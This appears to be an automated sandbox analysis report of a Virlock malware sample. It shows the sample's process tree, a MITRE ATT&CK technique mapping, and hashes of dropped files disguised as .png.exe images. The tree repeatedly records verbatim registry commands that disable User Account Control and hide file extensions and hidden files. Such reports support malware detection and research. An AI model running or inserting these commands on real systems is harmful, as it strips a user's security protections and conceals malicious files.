reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
36⤵
- UAC bypass
- Modifies registry key
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FekgEMsg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
36⤵
PID:4804

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
37⤵
PID:2140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
34⤵
- Modifies registry key
PID:2372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
34⤵
PID:4028

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
34⤵
- UAC bypass
- Modifies registry key
PID:1588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lUwQIoMQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
34⤵
PID:2164

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
35⤵
PID:3312

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
32⤵
- Modifies visibility of file extensions in Explorer
PID:636

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
32⤵
PID:4168

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
32⤵
- Modifies registry key
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cwQAkkYc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
32⤵
PID:208

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
33⤵
PID:4772

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
30⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
30⤵
- Modifies registry key
PID:4424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
30⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOMQEoUQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
30⤵
PID:3344

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
31⤵
PID:1480

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
28⤵
- Modifies visibility of file extensions in Explorer
PID:4700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
28⤵
PID:372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
28⤵
- UAC bypass
- Modifies registry key
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcQwAwwE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
28⤵
PID:4852

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
29⤵
PID:2368

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
26⤵
PID:2576

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
26⤵
PID:1808

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
26⤵
- UAC bypass
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bYcwwsQM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
26⤵
PID:4104

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
27⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
24⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
24⤵
PID:4908

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
24⤵
- UAC bypass
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LGQEIsAw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
24⤵
PID:4024

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
25⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
22⤵
PID:672

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
22⤵
PID:3168

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
22⤵
PID:1236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XEYEkEAI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
22⤵
PID:740

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
23⤵
PID:4384

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
20⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
20⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
20⤵
- UAC bypass
- Modifies registry key
PID:4156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KuUgcEMM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
20⤵
PID:880

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
21⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
18⤵
- Modifies visibility of file extensions in Explorer
PID:1512

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
18⤵
PID:4304

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
18⤵
- UAC bypass
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSsAAsYY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
18⤵
PID:4656

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
19⤵
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
16⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
16⤵
PID:3356

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
16⤵
- UAC bypass
PID:1852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WwwgUEYs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
16⤵
PID:608

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
17⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
14⤵
- Modifies visibility of file extensions in Explorer
PID:332

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
14⤵
PID:3484

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
14⤵
- UAC bypass
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ciQAgQcM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
14⤵
PID:1016

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
15⤵
PID:1772

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
12⤵
- Modifies visibility of file extensions in Explorer
PID:2684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
12⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
12⤵
- UAC bypass
PID:3988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NwoMAIwc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
12⤵
PID:3140

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
13⤵
PID:3396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
10⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
10⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
10⤵
- UAC bypass
PID:4452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HKIMgggw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
10⤵
PID:392

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
11⤵
PID:5060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
8⤵
- Modifies visibility of file extensions in Explorer
PID:1904

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
8⤵
- Modifies registry key
PID:3136

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
8⤵
- UAC bypass
PID:4076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PykYgcMk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
8⤵
PID:3412

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
9⤵
PID:680

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
6⤵
PID:920

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
6⤵
PID:4136

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
6⤵
PID:3696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uWoccoEE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
6⤵
PID:3296

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
7⤵
PID:5024

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
4⤵
- Modifies visibility of file extensions in Explorer
PID:2636

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
4⤵
PID:4000

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
4⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oaIwwIgA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
4⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
5⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
2⤵
- Modifies visibility of file extensions in Explorer
PID:4212

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
2⤵
PID:2748

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
2⤵
- UAC bypass
PID:2092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qKUAAckA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
3⤵
PID:4464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ZMwYEkUY\MaIgMwUc.exe

Filesize
112KB

MD5
8ed1a68b8baa59b3291ff1c93bf52a00

SHA1
f9efaa7a91d00a91b6f0ecb87fc86e1e76570433

SHA256
dce29604dd26a10cbe1307896a76d77d0ed284659453453e3d54f31cfd9c2ed9

SHA512
78d10a8d0a4eef38c30e79168f668ce6c60541ba6d55f578fe1985eeb8bc27fac29e3a8332d1eb05a522259d3bc28cbed25d7faa79fc5b0231dd936e2ebb543b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png.exe

Filesize
118KB

MD5
a53eb2be8736653b1b9ed7cfca3875a5

SHA1
569304dc0f1bb24d2c265f3230002e93b8921ca3

SHA256
a92b52bd31e742261ef05d3d12fabb67c5987848449798fc99091b9346c7ecb4

SHA512
73c2bc9430df3196f9bfba183ad04b8ed40c2c24944dbff3db6fcdfe6072600d882b621243c173a6c6dbe9986364225ae0748cf0e1a5f2ca61c83c4678533ca7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png.exe

Filesize
126KB

MD5
a8724c1e35be0376ca8f8cc6151f2690

SHA1
e3ec0085ee9dbe9cee7f6d702e54b517c004aec2

SHA256
adc1ae7363f81ad19f300280dd458aa59421abacf3662689768dd4128fe040df

SHA512
21228aba96806748eebdd70ee944603af52dc7cba1ee04b3a3af001655d7b0d83741067ddef0fd04021a78fd5a826da539ca5e5fe94602c4490a56bec606cdec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png.exe

Filesize
119KB

MD5
8f91208a3c259ff4d131ba710ddb02c3

SHA1
8a2f88c925978ff6aa83bbf9221ae8e205d633e8

SHA256
631d429ad28f650d74d92e7934a6bc5791ac2ee2c1f1c9266306a66148cd4423

SHA512
59495a17b37bde20eb92688c37499b01765769b20fc323e3b4d8a03e49d04a3f299a6d254f3cad2ca361571dc62710309ec3fc0750a4b1b051b6b18d29ce8dc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png.exe

Filesize
112KB

MD5
8d76f581b3e36f2480b4e0089806c987

SHA1
bcf2d16f0f926e8c10caf486e139b5e9dab264d1

SHA256
06defd5b3ebb83442fb06c56091828308d7e9f1574e321a2af08e5412a8df59d

SHA512
a59577eead9a244222c5a2bca98e6b9fb4ac283fa2f456cdb65d5f84a2b449bcb6880ce7cef146a74bb1acb0f3333c3a5e90665227515e458c4bccf2e88d56c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png.exe

Filesize
111KB

MD5
618d3b3b946ea3da523647454c3766f1

SHA1
88a64415fb7e4417af3d4c24dd8294ffb7a88039

SHA256
d93deb9ca1838e2f674b43965cc14ae943a474a13baf3f2c528640d17bea0eda

SHA512
43270b997c640aec01ab65ed728049c3aebcffb85cd492c0f6fea3d3c05365675545c1bf84dfa0662945ef26c7b841a9749395b3d971f8d14462e2062844ff4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png.exe

Filesize
111KB

MD5
f9487926cd76636997b1ccdb65aa948e

SHA1
d3f31c50f82887d5628aa8a8feccbf52e7a60a99

SHA256
8e9f46722b09e765abcb5a28b438df21054eb077f166c34b68e0560a4f14bacb

SHA512
b4e97f3dcec9aaed77552316e0e42d413f2b28598a83f3958415c7fc10b21f268169f8413876c46ba207aad285a50d328edc342ec03ae9c3768e8dbe5c2d79bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png.exe

Filesize
109KB

MD5
6764f1af6ec02a86f562791be4678706

SHA1
7585d9b07bf98ff7f07e92c8acd386e4c686e4e1

SHA256
e74a99db3072e78536d8eacfa51a6546b33877c7d4307b1e4b92f692addeeb50

SHA512
c50d9af82b2bacf6f56a9190c4c1e172c49232f020ffb1116748c91b3c07ddce2599aa18ad10219717dd83421d5a2797abde88e7974dcf92c858bb8cbfbcc26c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png.exe

Filesize
112KB

MD5
e83c95e450e250920f01bbc906dd7be6

SHA1
44e68582ee5845635ea0db921ebb790b477eddfb

SHA256
e8f6a279d82fffc2a346d6a8b530b8cbca2c2e328657810ec2867ca150d9e114

SHA512
adda2236f8d95379bce1745b83c985609fc0c7fe66b1a501ec1e5ce4d0e5a5f46e50b1581910c99efda8467e42314658821c02e8797d42724c0666ea5b8c1ce1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png.exe

Filesize
111KB

MD5
449de537b01e5901a7d43fb118f952a0

SHA1
ff1147ba59d820e4f12720ff3020b492404c8456

SHA256
aa81e4d1f5e6afc961f8daf43e6f78155bb17e8ebe3fec443646d78f7ddb718a

SHA512
668b2850ba9b37ba9735ed9b88d53d8d6876acc04e78b6aa656561e1a4fae4946f782d6f483493138890cbb5ed82c25ba53c1c20da716959265664ad1d0ca29c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png.exe

Filesize
112KB

MD5
1d6db4344fc57a9289d8afc925efc0aa

SHA1
d2e5ad28745c0bed7db38f22e6779e967af21445

SHA256
7f667f6793f7d931078a1c5be27f8ee3e5ecdae05775be424fd6f3e9e5d59d52

SHA512
35e8483dd02d7ecd4ce6bcb117fef2ed883ecc7968f70a3d43e060910125c94a4013a1b3a418d7d8ddd131d796413a09eb3ef3abcae7530c7d0d0a56e9509955

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.exe

Filesize
113KB

MD5
d9a60d2d0d1a4af096ec866885d544cb

SHA1
a74bc0a819bf5db63c8edf60d370778e09cb10e6

SHA256
a80c2334b9ec8f45653cab11cd9b923817c25f388468eb4b26489ad9332c3d5b

SHA512
102367b3dc8e091da3bfc312b884c8b0340cd07c2f1604084aa6082ffdbfb14f119c454ad0352158c7e2870d194b327ae2b3ffa72fca4c7bc3468a1aaf68387a

Download Submit
C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock

Filesize
497B

MD5
2f5d867c4572f12e93dcfc13e0ec2b49

SHA1
2576108b792cf0973df965a2cb98e731b4d8e242

SHA256
0b0bf88a3e2b92a6ccb92cac0a1ab584a5948f939cc3633b0116f7888ae06192

SHA512
7793746b57553bb729febee5552fc6a3596203c04cf5b1febf8d4f8e0247ca95dad5818167979eb8b762fbf53a02db8872d99761fdbe603a93e5f58afebf9f59

Download Submit
C:\Users\Admin\AppData\Local\Temp\AAUC.exe

Filesize
721KB

MD5
dabb3ad1313655f5b1217a111afdfa86

SHA1
255665d0ebc2fd87a2edf9fde8407167966e69bf

SHA256
6457c4a7363ea2aa8f4553c4784c2779c51af9482ec8444aa5fe6e34e620d820

SHA512
77e55f88d389d64f910f529cfbf986cf5bad42f9cc283d812756bb219f3502f7034bae978da0e379dd959fd7932b06283aca4aec9fd08db57f1ff9188975e58a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AIYq.exe

Filesize
115KB

MD5
fd1e22c91ec220cfaf7cfb1ab07e6667

SHA1
459f40dfa3540e7117b432b512cc2c40760db7f4

SHA256
2d54e6d587cda78da4f63079a1e8c02113d35872d632722f5d9aac761418862a

SHA512
df6c33e6981a21541e2f4be6f6f6be0ad078f95c01acf7d97ca4aae7021e2e7177f975763918c914c7bf95b7958de1ac4049a4cb0be055b65121e0b7b89a871a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AQge.exe

Filesize
553KB

MD5
cb79f03e19c43dd55da7e5320cb962ff

SHA1
b84dcb11928ea4ba1da7c811f51fdf2a0af4a6fe

SHA256
db98adb94b7c5519d4c0cdf246222980f7f2858a351e4f0a2f8009569d36ad04

SHA512
044fbc7ec61534311a31add0b30cb015a82f68b1a6f2b45a1ae2e94707d755b111edcb3a5a9e13654b78818009e50335f3fbbb8ff260ce2bf9704962f584279a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AUgq.exe

Filesize
112KB

MD5
62c8dddbc547f00046c95aa01445b72b

SHA1
a50fa0402cbe26a4354317097d41860fc0d44835

SHA256
b1b6fe68c995368d5a38c9da16d1d5053a6bddf0d0aa7797b5c585c50eb7e543

SHA512
cda427408ac85c6ff8c9e36028650c3337de76ff8feff5be9a04d5f8c7df3a1d22e478c574266c312cfe92e4390f38a74a031aa803048faaa9939e99641203b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\AwkY.exe

Filesize
110KB

MD5
319625f0c2d85b21b44905899ca25ae8

SHA1
fe4ba8e68a50ae5ba177b207d57749f38aef96ca

SHA256
4347ea816cf15578eeaafb2e7e6e3fa32e11be3fd28e73d9d325095ea9d22d84

SHA512
6d30b4d171b1fb964ea0646912776e5e9c8eb8fa3cb19a3812d42ca9209023dcad49dfffde9a368e4adf715433e87b20867bb4e3b027fdfd4cd6fe3b76033046

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMQM.exe

Filesize
114KB

MD5
75666373170a2827af08a37d8cfe5eb6

SHA1
51ecdc6df22c58de335961e373625790b342ed71

SHA256
1b606def846b3c7e29293f451a3bbe206b617ad05cfa690a1c1fa3df1ae645bb

SHA512
2a85f0072a3431e55e589eab20dacc7e22f24448dad50922567accf855178dadfa2051dd539fe2ba3a022ff7f7da3246af519c34bdf4f5d62b0a5d9a66bdec91

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMQg.exe

Filesize
137KB

MD5
9324f3917a875af6188b931c981125c3

SHA1
ee7f26f3530407aa6f6cec550ff9d86eff5ecc13

SHA256
684fd0d2d64379668d2c9383ea2a9bf925643558972e7786e36e4d880197a5cd

SHA512
9cbff286f96a9bdb947c89a6d5695f14be44ce1c8ff26be222ee802e60fdfe36ec0747192d27518dff85698170be0425f62c25527cad37e9e329e9ddf37e1f0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CgEq.exe

Filesize
118KB

MD5
4072be6d9e66f2b1efbcb36a3b5bc59c

SHA1
a6c71baa9309869c43e2c8aed610dd112f9a9250

SHA256
c0f444c9ae4d40305984daef59cb600e4d8f4810fbfcd53870900344d570d57d

SHA512
48c0dfea45b222a6d4f9b39a83ad65c33eecce9a3ba34478c159608cb3d5149b4b72704fc89a39bcda49fc281cecda09cfdc6f66887a3cbe5e81042c164bf27c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CkYI.exe

Filesize
671KB

MD5
6b1366015f6bbdb731a0b3963a9c6f53

SHA1
5fcf9a7410f2b02c776d375d51a12fbda50b6052

SHA256
6076b1279defe9339f38d1f259c4d0688804ef31aabb57a4994adaab8c14836d

SHA512
d9f186c9cc2eeb26be565cff064d51737d9dccc95f20e7bac255ca75e710ee6009e85c1f7f6b8ff34eb6feb40630dcf266f8ac3ffaec898640b6789d5f233cde

Download Submit
